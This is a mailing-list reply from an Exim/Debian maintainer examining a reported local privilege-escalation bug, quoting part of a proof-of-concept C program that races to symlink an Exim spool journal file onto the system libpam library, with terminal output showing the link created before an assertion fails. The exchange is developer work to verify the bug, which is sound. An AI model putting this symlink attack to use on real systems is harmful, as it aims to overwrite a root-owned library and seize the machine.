On 2016-09-11 Jeremy Harris <jgh@???> wrote:
> On 11/09/16 17:16, Andreas Metzler wrote:
> >> And... is that
> >> repeat-by relying on the writability of a library directory
> >> by an unpriv process?
> >
> > /lib/x86_64-linux-gnu/ is 0755 root:root.
> In that case I'm not seeing how this stage works:
> - Symlink /var/spool/exim4/input/xxxxxx-xxxxxx-xx-J to
> /lib/x86_64-linux-gnu/libpam.so.0.83.1
> Perhaps I'm not understanding "to". What is the "ls -l" output for
> the symlink just created?
strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J");
dirStruct=opendir("/var/spool/exim4/msglog");
assert(dirStruct);
result=1;
while(result) {
while((dirEnt=readdir(dirStruct))) {
if(*dirEnt->d_name=='.') continue;
// Be fast, perhaps aligned word copy needed. Pray to 23 in demo.
system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
strncpy(linkPath+23, dirEnt->d_name, 16);
system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
result=symlink(TARGET_PATH, linkPath);
system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
assert(!result);
fprintf(stderr, "Relinked %s\n", linkPath);
break;
...
$ /tmp/EximUpgrade --Upgrade
-rw-r--r-- 1 root root 60104 May 18 00:22 /lib/x86_64-linux-gnu/libpam.so.0.83.1
/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim 19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
-rw-r--r-- 1 root root 60104 May 18 00:22 /lib/x86_64-linux-gnu/libpam.so.0.83.1
/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim 19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
-rw-r--r-- 1 root root 60104 May 18 00:22 /lib/x86_64-linux-gnu/libpam.so.0.83.1
/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim 19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
lrwxrwxrwx 1 Debian-exim Debian-exim 38 Sep 11 17:20 1bj8R0-0004c9-JG-J -> /lib/x86_64-linux-gnu/libpam.so.0.83.1
Relinked /var/spool/exim4/input/1bj8R0-0004c9-JG-J
Target ready for writing
EximUpgrade: EximUpgrade-debugme.c:163: main: Assertion `result==newStatData.st_size' failed.
Aborted
cu Andreas
--
`What a good friend you are to him, Dr. Maturin. His other friends are
so grateful to you.'
`I sew his ears on from time to time, sure'